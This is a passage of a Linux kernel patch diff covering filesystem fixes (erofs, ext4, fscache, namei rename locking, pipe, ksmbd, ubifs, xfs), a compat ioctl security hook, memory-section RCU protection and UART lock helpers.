+ 
+ 	/* LZ4 decompression inplace is only safe if zero_padding is enabled */
+ 	if (erofs_sb_has_zero_padding(EROFS_SB(rq->sb))) {
+@@ -223,7 +223,7 @@ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+ 				min_t(unsigned int, rq->inputsize,
+ 				      EROFS_BLKSIZ - rq->pageofs_in));
+ 		if (ret) {
+-			kunmap_atomic(headpage);
++			kunmap_local(headpage);
+ 			return ret;
+ 		}
+ 		may_inplace = !((rq->pageofs_in + rq->inputsize) &
+@@ -231,11 +231,12 @@ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+ 	}
+ 
+ 	inputmargin = rq->pageofs_in;
+-	src = z_erofs_lz4_handle_overlap(ctx, headpage, &inputmargin,
++	src = z_erofs_lz4_handle_overlap(ctx, headpage, dst, &inputmargin,
+ 					 &maptype, may_inplace);
+ 	if (IS_ERR(src))
+ 		return PTR_ERR(src);
+ 
++	out = dst + rq->pageofs_out;
+ 	/* legacy format could compress extra data in a pcluster. */
+ 	if (rq->partial_decoding || !support_0padding)
+ 		ret = LZ4_decompress_safe_partial(src + inputmargin, out,
+@@ -261,12 +262,12 @@ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+ 	}
+ 
+ 	if (maptype == 0) {
+-		kunmap_atomic(headpage);
++		kunmap_local(headpage);
+ 	} else if (maptype == 1) {
+ 		vm_unmap_ram(src, ctx->inpages);
+ 	} else if (maptype == 2) {
+ 		erofs_put_pcpubuf(src);
+-	} else {
++	} else if (maptype != 3) {
+ 		DBG_BUGON(1);
+ 		return -EFAULT;
+ 	}
+@@ -289,7 +290,7 @@ static int z_erofs_lz4_decompress(struct z_erofs_decompress_req *rq,
+ 	/* one optimized fast path only for non bigpcluster cases yet */
+ 	if (ctx.inpages == 1 && ctx.outpages == 1 && !rq->inplace_io) {
+ 		DBG_BUGON(!*rq->out);
+-		dst = kmap_atomic(*rq->out);
++		dst = kmap_local_page(*rq->out);
+ 		dst_maptype = 0;
+ 		goto dstmap_out;
+ 	}
+@@ -309,9 +310,9 @@ static int z_erofs_lz4_decompress(struct z_erofs_decompress_req *rq,
+ 	}
+ 
+ dstmap_out:
+-	ret = z_erofs_lz4_decompress_mem(&ctx, dst + rq->pageofs_out);
++	ret = z_erofs_lz4_decompress_mem(&ctx, dst);
+ 	if (!dst_maptype)
+-		kunmap_atomic(dst);
++		kunmap_local(dst);
+ 	else if (dst_maptype == 2)
+ 		vm_unmap_ram(dst, ctx.outpages);
+ 	return ret;
+diff --git a/fs/exec.c b/fs/exec.c
+index 283012eb1aeb9..39f7751c90fc3 100644
+--- a/fs/exec.c
++++ b/fs/exec.c
+@@ -1410,6 +1410,9 @@ int begin_new_exec(struct linux_binprm * bprm)
+ 
+ out_unlock:
+ 	up_write(&me->signal->exec_update_lock);
++	if (!bprm->cred)
++		mutex_unlock(&me->signal->cred_guard_mutex);
++
+ out:
+ 	return retval;
+ }
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index a6e41746890d4..33be702d6e380 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -6421,11 +6421,16 @@ __acquires(bitlock)
+ static ext4_grpblk_t ext4_last_grp_cluster(struct super_block *sb,
+ 					   ext4_group_t grp)
+ {
+-	if (grp < ext4_get_groups_count(sb))
+-		return EXT4_CLUSTERS_PER_GROUP(sb) - 1;
+-	return (ext4_blocks_count(EXT4_SB(sb)->s_es) -
+-		ext4_group_first_block_no(sb, grp) - 1) >>
+-					EXT4_CLUSTER_BITS(sb);
++	unsigned long nr_clusters_in_group;
++
++	if (grp < (ext4_get_groups_count(sb) - 1))
++		nr_clusters_in_group = EXT4_CLUSTERS_PER_GROUP(sb);
++	else
++		nr_clusters_in_group = (ext4_blocks_count(EXT4_SB(sb)->s_es) -
++					ext4_group_first_block_no(sb, grp))
++				       >> EXT4_CLUSTER_BITS(sb);
++
++	return nr_clusters_in_group - 1;
+ }
+ 
+ static bool ext4_trim_interrupted(void)
+diff --git a/fs/fscache/cache.c b/fs/fscache/cache.c
+index d645f8b302a27..9397ed39b0b4e 100644
+--- a/fs/fscache/cache.c
++++ b/fs/fscache/cache.c
+@@ -179,13 +179,14 @@ EXPORT_SYMBOL(fscache_acquire_cache);
+ void fscache_put_cache(struct fscache_cache *cache,
+ 		       enum fscache_cache_trace where)
+ {
+-	unsigned int debug_id = cache->debug_id;
++	unsigned int debug_id;
+ 	bool zero;
+ 	int ref;
+ 
+ 	if (IS_ERR_OR_NULL(cache))
+ 		return;
+ 
++	debug_id = cache->debug_id;
+ 	zero = __refcount_dec_and_test(&cache->ref, &ref);
+ 	trace_fscache_cache(debug_id, ref - 1, where);
+ 
+diff --git a/fs/ioctl.c b/fs/ioctl.c
+index 80ac36aea913b..2bd05509295ac 100644
+--- a/fs/ioctl.c
++++ b/fs/ioctl.c
+@@ -916,8 +916,7 @@ COMPAT_SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd,
+ 	if (!f.file)
+ 		return -EBADF;
+ 
+-	/* RED-PEN how should LSM module know it's handling 32bit? */
+-	error = security_file_ioctl(f.file, cmd, arg);
++	error = security_file_ioctl_compat(f.file, cmd, arg);
+ 	if (error)
+ 		goto out;
+ 
+diff --git a/fs/namei.c b/fs/namei.c
+index b5578f4ce5d6e..9e336b408ed17 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -3017,20 +3017,14 @@ static struct dentry *lock_two_directories(struct dentry *p1, struct dentry *p2)
+ 	p = d_ancestor(p2, p1);
+ 	if (p) {
+ 		inode_lock_nested(p2->d_inode, I_MUTEX_PARENT);
+-		inode_lock_nested(p1->d_inode, I_MUTEX_CHILD);
++		inode_lock_nested(p1->d_inode, I_MUTEX_PARENT2);
+ 		return p;
+ 	}
+ 
+ 	p = d_ancestor(p1, p2);
+-	if (p) {
+-		inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
+-		inode_lock_nested(p2->d_inode, I_MUTEX_CHILD);
+-		return p;
+-	}
+-
+-	lock_two_inodes(p1->d_inode, p2->d_inode,
+-			I_MUTEX_PARENT, I_MUTEX_PARENT2);
+-	return NULL;
++	inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
++	inode_lock_nested(p2->d_inode, I_MUTEX_PARENT2);
++	return p;
+ }
+ 
+ /*
+@@ -4735,11 +4729,12 @@ SYSCALL_DEFINE2(link, const char __user *, oldname, const char __user *, newname
+  *
+  *	a) we can get into loop creation.
+  *	b) race potential - two innocent renames can create a loop together.
+- *	   That's where 4.4 screws up. Current fix: serialization on
++ *	   That's where 4.4BSD screws up. Current fix: serialization on
+  *	   sb->s_vfs_rename_mutex. We might be more accurate, but that's another
+  *	   story.
+- *	c) we have to lock _four_ objects - parents and victim (if it exists),
+- *	   and source.
++ *	c) we may have to lock up to _four_ objects - parents and victim (if it exists),
++ *	   and source (if it's a non-directory or a subdirectory that moves to
++ *	   different parent).
+  *	   And that - after we got ->i_mutex on parents (until then we don't know
+  *	   whether the target exists).  Solution: try to be smart with locking
+  *	   order for inodes.  We rely on the fact that tree topology may change
+@@ -4771,6 +4766,7 @@ int vfs_rename(struct renamedata *rd)
+ 	bool new_is_dir = false;
+ 	unsigned max_links = new_dir->i_sb->s_max_links;
+ 	struct name_snapshot old_name;
++	bool lock_old_subdir, lock_new_subdir;
+ 
+ 	if (source == target)
+ 		return 0;
+@@ -4824,15 +4820,32 @@ int vfs_rename(struct renamedata *rd)
+ 	take_dentry_name_snapshot(&old_name, old_dentry);
+ 	dget(new_dentry);
+ 	/*
+-	 * Lock all moved children. Moved directories may need to change parent
+-	 * pointer so they need the lock to prevent against concurrent
+-	 * directory changes moving parent pointer. For regular files we've
+-	 * historically always done this. The lockdep locking subclasses are
+-	 * somewhat arbitrary but RENAME_EXCHANGE in particular can swap
+-	 * regular files and directories so it's difficult to tell which
+-	 * subclasses to use.
++	 * Lock children.
++	 * The source subdirectory needs to be locked on cross-directory
++	 * rename or cross-directory exchange since its parent changes.
++	 * The target subdirectory needs to be locked on cross-directory
++	 * exchange due to parent change and on any rename due to becoming
++	 * a victim.
++	 * Non-directories need locking in all cases (for NFS reasons);
++	 * they get locked after any subdirectories (in inode address order).
++	 *
++	 * NOTE: WE ONLY LOCK UNRELATED DIRECTORIES IN CROSS-DIRECTORY CASE.
++	 * NEVER, EVER DO THAT WITHOUT ->s_vfs_rename_mutex.
+ 	 */
+-	lock_two_inodes(source, target, I_MUTEX_NORMAL, I_MUTEX_NONDIR2);
++	lock_old_subdir = new_dir != old_dir;
++	lock_new_subdir = new_dir != old_dir || !(flags & RENAME_EXCHANGE);
++	if (is_dir) {
++		if (lock_old_subdir)
++			inode_lock_nested(source, I_MUTEX_CHILD);
++		if (target && (!new_is_dir || lock_new_subdir))
++			inode_lock(target);
++	} else if (new_is_dir) {
++		if (lock_new_subdir)
++			inode_lock_nested(target, I_MUTEX_CHILD);
++		inode_lock(source);
++	} else {
++		lock_two_nondirectories(source, target);
++	}
+ 
+ 	error = -EPERM;
+ 	if (IS_SWAPFILE(source) || (target && IS_SWAPFILE(target)))
+@@ -4880,8 +4893,9 @@ int vfs_rename(struct renamedata *rd)
+ 			d_exchange(old_dentry, new_dentry);
+ 	}
+ out:
+-	inode_unlock(source);
+-	if (target)
++	if (!is_dir || lock_old_subdir)
++		inode_unlock(source);
++	if (target && (!new_is_dir || lock_new_subdir))
+ 		inode_unlock(target);
+ 	dput(new_dentry);
+ 	if (!error) {
+diff --git a/fs/pipe.c b/fs/pipe.c
+index 42c7ff41c2dba..9873a6030df56 100644
+--- a/fs/pipe.c
++++ b/fs/pipe.c
+@@ -436,12 +436,10 @@ pipe_write(struct kiocb *iocb, struct iov_iter *from)
+ 		goto out;
+ 	}
+ 
+-#ifdef CONFIG_WATCH_QUEUE
+-	if (pipe->watch_queue) {
++	if (pipe_has_watch_queue(pipe)) {
+ 		ret = -EXDEV;
+ 		goto out;
+ 	}
+-#endif
+ 
+ 	/*
+ 	 * If it wasn't empty we try to merge new data into
+@@ -1303,6 +1301,11 @@ int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
+ 	pipe->tail = tail;
+ 	pipe->head = head;
+ 
++	if (!pipe_has_watch_queue(pipe)) {
++		pipe->max_usage = nr_slots;
++		pipe->nr_accounted = nr_slots;
++	}
++
+ 	spin_unlock_irq(&pipe->rd_wait.lock);
+ 
+ 	/* This might have made more room for writers */
+@@ -1320,10 +1323,8 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
+ 	unsigned int nr_slots, size;
+ 	long ret = 0;
+ 
+-#ifdef CONFIG_WATCH_QUEUE
+-	if (pipe->watch_queue)
++	if (pipe_has_watch_queue(pipe))
+ 		return -EBUSY;
+-#endif
+ 
+ 	size = round_pipe_size(arg);
+ 	nr_slots = size >> PAGE_SHIFT;
+@@ -1356,8 +1357,6 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
+ 	if (ret < 0)
+ 		goto out_revert_acct;
+ 
+-	pipe->max_usage = nr_slots;
+-	pipe->nr_accounted = nr_slots;
+ 	return pipe->max_usage * PAGE_SIZE;
+ 
+ out_revert_acct:
+@@ -1375,10 +1374,8 @@ struct pipe_inode_info *get_pipe_info(struct file *file, bool for_splice)
+ 
+ 	if (file->f_op != &pipefifo_fops || !pipe)
+ 		return NULL;
+-#ifdef CONFIG_WATCH_QUEUE
+-	if (for_splice && pipe->watch_queue)
++	if (for_splice && pipe_has_watch_queue(pipe))
+ 		return NULL;
+-#endif
+ 	return pipe;
+ }
+ 
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+index 7977827c65410..09e1e7771592f 100644
+--- a/fs/smb/server/connection.c
++++ b/fs/smb/server/connection.c
+@@ -284,6 +284,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		goto out;
+ 
+ 	conn->last_active = jiffies;
++	set_freezable();
+ 	while (ksmbd_conn_alive(conn)) {
+ 		if (try_to_freeze())
+ 			continue;
+diff --git a/fs/smb/server/ksmbd_netlink.h b/fs/smb/server/ksmbd_netlink.h
+index b7521e41402e0..0ebf91ffa2361 100644
+--- a/fs/smb/server/ksmbd_netlink.h
++++ b/fs/smb/server/ksmbd_netlink.h
+@@ -304,7 +304,8 @@ enum ksmbd_event {
+ 	KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
+ 	KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE	= 15,
+ 
+-	KSMBD_EVENT_MAX
++	__KSMBD_EVENT_MAX,
++	KSMBD_EVENT_MAX = __KSMBD_EVENT_MAX - 1
+ };
+ 
+ /*
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index f1831e26adad9..1253e9bde34c8 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -105,7 +105,7 @@ static int alloc_lease(struct oplock_info *opinfo, struct lease_ctx_info *lctx)
+ 	lease->is_dir = lctx->is_dir;
+ 	memcpy(lease->parent_lease_key, lctx->parent_lease_key, SMB2_LEASE_KEY_SIZE);
+ 	lease->version = lctx->version;
+-	lease->epoch = le16_to_cpu(lctx->epoch);
++	lease->epoch = le16_to_cpu(lctx->epoch) + 1;
+ 	INIT_LIST_HEAD(&opinfo->lease_entry);
+ 	opinfo->o_lease = lease;
+ 
+@@ -546,6 +546,7 @@ static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
+ 			     atomic_read(&ci->sop_count)) == 1) {
+ 				if (lease->state != SMB2_LEASE_NONE_LE &&
+ 				    lease->state == (lctx->req_state & lease->state)) {
++					lease->epoch++;
+ 					lease->state |= lctx->req_state;
+ 					if (lctx->req_state &
+ 						SMB2_LEASE_WRITE_CACHING_LE)
+@@ -556,13 +557,17 @@ static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
+ 				    atomic_read(&ci->sop_count)) > 1) {
+ 				if (lctx->req_state ==
+ 				    (SMB2_LEASE_READ_CACHING_LE |
+-				     SMB2_LEASE_HANDLE_CACHING_LE))
++				     SMB2_LEASE_HANDLE_CACHING_LE)) {
++					lease->epoch++;
+ 					lease->state = lctx->req_state;
++				}
+ 			}
+ 
+ 			if (lctx->req_state && lease->state ==
+-			    SMB2_LEASE_NONE_LE)
++			    SMB2_LEASE_NONE_LE) {
++				lease->epoch++;
+ 				lease_none_upgrade(opinfo, lctx->req_state);
++			}
+ 		}
+ 		read_lock(&ci->m_lock);
+ 	}
+@@ -1035,7 +1040,8 @@ static void copy_lease(struct oplock_info *op1, struct oplock_info *op2)
+ 	       SMB2_LEASE_KEY_SIZE);
+ 	lease2->duration = lease1->duration;
+ 	lease2->flags = lease1->flags;
+-	lease2->epoch = lease1->epoch++;
++	lease2->epoch = lease1->epoch;
++	lease2->version = lease1->version;
+ }
+ 
+ static int add_lease_global_list(struct oplock_info *opinfo)
+@@ -1453,7 +1459,7 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+ 		memcpy(buf->lcontext.LeaseKey, lease->lease_key,
+ 		       SMB2_LEASE_KEY_SIZE);
+ 		buf->lcontext.LeaseFlags = lease->flags;
+-		buf->lcontext.Epoch = cpu_to_le16(++lease->epoch);
++		buf->lcontext.Epoch = cpu_to_le16(lease->epoch);
+ 		buf->lcontext.LeaseState = lease->state;
+ 		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
+ 		       SMB2_LEASE_KEY_SIZE);
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 6826b562073e0..4cfa45c2727ea 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -2321,11 +2321,12 @@ out:
+  * @eabuf:	set info command buffer
+  * @buf_len:	set info command buffer length
+  * @path:	dentry path for get ea
++ * @get_write:	get write access to a mount
+  *
+  * Return:	0 on success, otherwise error
+  */
+ static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
+-		       const struct path *path)
++		       const struct path *path, bool get_write)
+ {
+ 	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+ 	char *attr_name = NULL, *value;
+@@ -3013,7 +3014,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 			rc = smb2_set_ea(&ea_buf->ea,
+ 					 le32_to_cpu(ea_buf->ccontext.DataLength),
+-					 &path);
++					 &path, false);
+ 			if (rc == -EOPNOTSUPP)
+ 				rc = 0;
+ 			else if (rc)
+@@ -5578,6 +5579,7 @@ static int smb2_rename(struct ksmbd_work *work,
+ 	if (!file_info->ReplaceIfExists)
+ 		flags = RENAME_NOREPLACE;
+ 
++	smb_break_all_levII_oplock(work, fp, 0);
+ 	rc = ksmbd_vfs_rename(work, &fp->filp->f_path, new_name, flags);
+ out:
+ 	kfree(new_name);
+@@ -5990,7 +5992,7 @@ static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 			return -EINVAL;
+ 
+ 		return smb2_set_ea((struct smb2_ea_info *)req->Buffer,
+-				   buf_len, &fp->filp->f_path);
++				   buf_len, &fp->filp->f_path, true);
+ 	}
+ 	case FILE_POSITION_INFORMATION:
+ 	{
+diff --git a/fs/smb/server/transport_ipc.c b/fs/smb/server/transport_ipc.c
+index b49d47bdafc94..f29bb03f0dc47 100644
+--- a/fs/smb/server/transport_ipc.c
++++ b/fs/smb/server/transport_ipc.c
+@@ -74,7 +74,7 @@ static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info)
+ static int handle_generic_event(struct sk_buff *skb, struct genl_info *info);
+ static int ksmbd_ipc_heartbeat_request(void);
+ 
+-static const struct nla_policy ksmbd_nl_policy[KSMBD_EVENT_MAX] = {
++static const struct nla_policy ksmbd_nl_policy[KSMBD_EVENT_MAX + 1] = {
+ 	[KSMBD_EVENT_UNSPEC] = {
+ 		.len = 0,
+ 	},
+@@ -403,7 +403,7 @@ static int handle_generic_event(struct sk_buff *skb, struct genl_info *info)
+ 		return -EPERM;
+ #endif
+ 
+-	if (type >= KSMBD_EVENT_MAX) {
++	if (type > KSMBD_EVENT_MAX) {
+ 		WARN_ON(1);
+ 		return -EINVAL;
+ 	}
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 66ba57a139d2a..4d9782e2fab1a 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -1226,6 +1226,8 @@ out_cancel:
+ 	dir_ui->ui_size = dir->i_size;
+ 	mutex_unlock(&dir_ui->ui_mutex);
+ out_inode:
++	/* Free inode->i_link before inode is marked as bad. */
++	fscrypt_free_inode(inode);
+ 	make_bad_inode(inode);
+ 	iput(inode);
+ out_fname:
+diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
+index 4b179526913f4..12662b169b716 100644
+--- a/fs/xfs/xfs_super.c
++++ b/fs/xfs/xfs_super.c
+@@ -1458,6 +1458,18 @@ xfs_fs_fill_super(
+ 
+ 	mp->m_super = sb;
+ 
++	/*
++	 * Copy VFS mount flags from the context now that all parameter parsing
++	 * is guaranteed to have been completed by either the old mount API or
++	 * the newer fsopen/fsconfig API.
++	 */
++	if (fc->sb_flags & SB_RDONLY)
++		set_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
++	if (fc->sb_flags & SB_DIRSYNC)
++		mp->m_features |= XFS_FEAT_DIRSYNC;
++	if (fc->sb_flags & SB_SYNCHRONOUS)
++		mp->m_features |= XFS_FEAT_WSYNC;
++
+ 	error = xfs_fs_validate_params(mp);
+ 	if (error)
+ 		goto out_free_names;
+@@ -1915,6 +1927,11 @@ static const struct fs_context_operations xfs_context_ops = {
+ 	.free        = xfs_fs_free,
+ };
+ 
++/*
++ * WARNING: do not initialise any parameters in this function that depend on
++ * mount option parsing having already been performed as this can be called from
++ * fsopen() before any parameters have been set.
++ */
+ static int xfs_init_fs_context(
+ 	struct fs_context	*fc)
+ {
+@@ -1947,16 +1964,6 @@ static int xfs_init_fs_context(
+ 	mp->m_logbsize = -1;
+ 	mp->m_allocsize_log = 16; /* 64k */
+ 
+-	/*
+-	 * Copy binary VFS mount flags we are interested in.
+-	 */
+-	if (fc->sb_flags & SB_RDONLY)
+-		set_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
+-	if (fc->sb_flags & SB_DIRSYNC)
+-		mp->m_features |= XFS_FEAT_DIRSYNC;
+-	if (fc->sb_flags & SB_SYNCHRONOUS)
+-		mp->m_features |= XFS_FEAT_WSYNC;
+-
+ 	fc->s_fs_info = mp;
+ 	fc->ops = &xfs_context_ops;
+ 
+diff --git a/include/linux/async.h b/include/linux/async.h
+index cce4ad31e8fcf..33c9ff4afb492 100644
+--- a/include/linux/async.h
++++ b/include/linux/async.h
+@@ -90,6 +90,8 @@ async_schedule_dev(async_func_t func, struct device *dev)
+ 	return async_schedule_node(func, dev, dev_to_node(dev));
+ }
+ 
++bool async_schedule_dev_nocall(async_func_t func, struct device *dev);
++
+ /**
+  * async_schedule_dev_domain - A device specific version of async_schedule_domain
+  * @func: function to execute asynchronously
+diff --git a/include/linux/lsm_hook_defs.h b/include/linux/lsm_hook_defs.h
+index 02b19c508b78f..6239a378c0ea8 100644
+--- a/include/linux/lsm_hook_defs.h
++++ b/include/linux/lsm_hook_defs.h
+@@ -165,6 +165,8 @@ LSM_HOOK(int, 0, file_alloc_security, struct file *file)
+ LSM_HOOK(void, LSM_RET_VOID, file_free_security, struct file *file)
+ LSM_HOOK(int, 0, file_ioctl, struct file *file, unsigned int cmd,
+ 	 unsigned long arg)
++LSM_HOOK(int, 0, file_ioctl_compat, struct file *file, unsigned int cmd,
++	 unsigned long arg)
+ LSM_HOOK(int, 0, mmap_addr, unsigned long addr)
+ LSM_HOOK(int, 0, mmap_file, struct file *file, unsigned long reqprot,
+ 	 unsigned long prot, unsigned long flags)
+diff --git a/include/linux/mc146818rtc.h b/include/linux/mc146818rtc.h
+index b0da04fe087bb..34dfcc77f505a 100644
+--- a/include/linux/mc146818rtc.h
++++ b/include/linux/mc146818rtc.h
+@@ -126,10 +126,11 @@ struct cmos_rtc_board_info {
+ #endif /* ARCH_RTC_LOCATION */
+ 
+ bool mc146818_does_rtc_work(void);
+-int mc146818_get_time(struct rtc_time *time);
++int mc146818_get_time(struct rtc_time *time, int timeout);
+ int mc146818_set_time(struct rtc_time *time);
+ 
+ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
++			int timeout,
+ 			void *param);
+ 
+ #endif /* _MC146818RTC_H */
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 323ee36df683e..638d2124d1cb9 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -1622,6 +1622,7 @@ static inline unsigned long section_nr_to_pfn(unsigned long sec)
+ #define SUBSECTION_ALIGN_DOWN(pfn) ((pfn) & PAGE_SUBSECTION_MASK)
+ 
+ struct mem_section_usage {
++	struct rcu_head rcu;
+ #ifdef CONFIG_SPARSEMEM_VMEMMAP
+ 	DECLARE_BITMAP(subsection_map, SUBSECTIONS_PER_SECTION);
+ #endif
+@@ -1815,7 +1816,7 @@ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+ {
+ 	int idx = subsection_map_index(pfn);
+ 
+-	return test_bit(idx, ms->usage->subsection_map);
++	return test_bit(idx, READ_ONCE(ms->usage)->subsection_map);
+ }
+ #else
+ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+@@ -1839,6 +1840,7 @@ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+ static inline int pfn_valid(unsigned long pfn)
+ {
+ 	struct mem_section *ms;
++	int ret;
+ 
+ 	/*
+ 	 * Ensure the upper PAGE_SHIFT bits are clear in the
+@@ -1852,13 +1854,19 @@ static inline int pfn_valid(unsigned long pfn)
+ 	if (pfn_to_section_nr(pfn) >= NR_MEM_SECTIONS)
+ 		return 0;
+ 	ms = __pfn_to_section(pfn);
+-	if (!valid_section(ms))
++	rcu_read_lock();
++	if (!valid_section(ms)) {
++		rcu_read_unlock();
+ 		return 0;
++	}
+ 	/*
+ 	 * Traditionally early sections always returned pfn_valid() for
+ 	 * the entire section-sized span.
+ 	 */
+-	return early_section(ms) || pfn_section_valid(ms, pfn);
++	ret = early_section(ms) || pfn_section_valid(ms, pfn);
++	rcu_read_unlock();
++
++	return ret;
+ }
+ #endif
+ 
+diff --git a/include/linux/pipe_fs_i.h b/include/linux/pipe_fs_i.h
+index 28b3c6a673975..1f1e7ae953205 100644
+--- a/include/linux/pipe_fs_i.h
++++ b/include/linux/pipe_fs_i.h
+@@ -124,6 +124,22 @@ struct pipe_buf_operations {
+ 	bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
+ };
+ 
++/**
++ * pipe_has_watch_queue - Check whether the pipe is a watch_queue,
++ * i.e. it was created with O_NOTIFICATION_PIPE
++ * @pipe: The pipe to check
++ *
++ * Return: true if pipe is a watch queue, false otherwise.
++ */
++static inline bool pipe_has_watch_queue(const struct pipe_inode_info *pipe)
++{
++#ifdef CONFIG_WATCH_QUEUE
++	return pipe->watch_queue != NULL;
++#else
++	return false;
++#endif
++}
++
+ /**
+  * pipe_empty - Return true if the pipe is empty
+  * @head: The pipe ring head pointer
+diff --git a/include/linux/rmap.h b/include/linux/rmap.h
+index 2bdba700bc3e3..7d1ecd9b43733 100644
+--- a/include/linux/rmap.h
++++ b/include/linux/rmap.h
+@@ -250,8 +250,8 @@ static inline int page_try_dup_anon_rmap(struct page *page, bool compound,
+ 	 * guarantee the pinned page won't be randomly replaced in the
+ 	 * future on write faults.
+ 	 */
+-	if (likely(!is_device_private_page(page) &&
+-	    unlikely(page_needs_cow_for_dma(vma, page))))
++	if (likely(!is_device_private_page(page)) &&
++	    unlikely(page_needs_cow_for_dma(vma, page)))
+ 		return -EBUSY;
+ 
+ 	ClearPageAnonExclusive(page);
+diff --git a/include/linux/security.h b/include/linux/security.h
+index a6c97cc57caa0..2772f6375f140 100644
+--- a/include/linux/security.h
++++ b/include/linux/security.h
+@@ -385,6 +385,8 @@ int security_file_permission(struct file *file, int mask);
+ int security_file_alloc(struct file *file);
+ void security_file_free(struct file *file);
+ int security_file_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
++int security_file_ioctl_compat(struct file *file, unsigned int cmd,
++			       unsigned long arg);
+ int security_mmap_file(struct file *file, unsigned long prot,
+ 			unsigned long flags);
+ int security_mmap_addr(unsigned long addr);
+@@ -969,6 +971,13 @@ static inline int security_file_ioctl(struct file *file, unsigned int cmd,
+ 	return 0;
+ }
+ 
++static inline int security_file_ioctl_compat(struct file *file,
++					     unsigned int cmd,
++					     unsigned long arg)
++{
++	return 0;
++}
++
+ static inline int security_mmap_file(struct file *file, unsigned long prot,
+ 				     unsigned long flags)
+ {
+diff --git a/include/linux/serial_core.h b/include/linux/serial_core.h
+index d657f2a42a7b8..13bf20242b61a 100644
+--- a/include/linux/serial_core.h
++++ b/include/linux/serial_core.h
+@@ -583,6 +583,85 @@ struct uart_port {
+ 	void			*private_data;		/* generic platform data pointer */
+ };
+ 
++/**
++ * uart_port_lock - Lock the UART port
++ * @up:		Pointer to UART port structure
++ */
++static inline void uart_port_lock(struct uart_port *up)
++{
++	spin_lock(&up->lock);
++}
++
++/**
++ * uart_port_lock_irq - Lock the UART port and disable interrupts
++ * @up:		Pointer to UART port structure
++ */
++static inline void uart_port_lock_irq(struct uart_port *up)
++{
++	spin_lock_irq(&up->lock);
++}
++
++/**
++ * uart_port_lock_irqsave - Lock the UART port, save and disable interrupts
++ * @up:		Pointer to UART port structure
++ * @flags:	Pointer to interrupt flags storage
++ */
++static inline void uart_port_lock_irqsave(struct uart_port *up, unsigned long *flags)
++{
++	spin_lock_irqsave(&up->lock, *flags);
++}
++
++/**
++ * uart_port_trylock - Try to lock the UART port
++ * @up:		Pointer to UART port structure
++ *
++ * Returns: True if lock was acquired, false otherwise
++ */
++static inline bool uart_port_trylock(struct uart_port *up)
++{
++	return spin_trylock(&up->lock);
++}
++
++/**
++ * uart_port_trylock_irqsave - Try to lock the UART port, save and disable interrupts
++ * @up:		Pointer to UART port structure
++ * @flags:	Pointer to interrupt flags storage
++ *
++ * Returns: True if lock was acquired, false otherwise
++ */
++static inline bool uart_port_trylock_irqsave(struct uart_port *up, unsigned long *flags)
++{
++	return spin_trylock_irqsave(&up->lock, *flags);
++}
++
++/**
++ * uart_port_unlock - Unlock the UART port
++ * @up:		Pointer to UART port structure
++ */
++static inline void uart_port_unlock(struct uart_port *up)
++{
++	spin_unlock(&up->lock);
++}
++
++/**
++ * uart_port_unlock_irq - Unlock the UART port and re-enable interrupts
++ * @up:		Pointer to UART port structure
++ */
++static inline void uart_port_unlock_irq(struct uart_port *up)
++{
++	spin_unlock_irq(&up->lock);
++}
++
++/**
++ * uart_port_unlock_irqrestore - Unlock the UART port, restore interrupts
++ * @up:		Pointer to UART port structure
++ * @flags:	The saved interrupt flags for restore
++ */
++static inline void uart_port_unlock_irqrestore(struct uart_port *up, unsigned long flags)
++{
++	spin_unlock_irqrestore(&up->lock, flags);
++}
++
+ static inline int serial_port_in(struct uart_port *up, int offset)
+ {
+ 	return up->serial_in(up, offset);
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index c953b8c0d2f43..bd4418377bacf 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -500,12 +500,6 @@ static inline bool sk_psock_strp_enabled(struct sk_psock *psock)
+ 	return !!psock->saved_data_ready;
+ }
+ 
+-static inline bool sk_is_udp(const struct sock *sk)
+-{
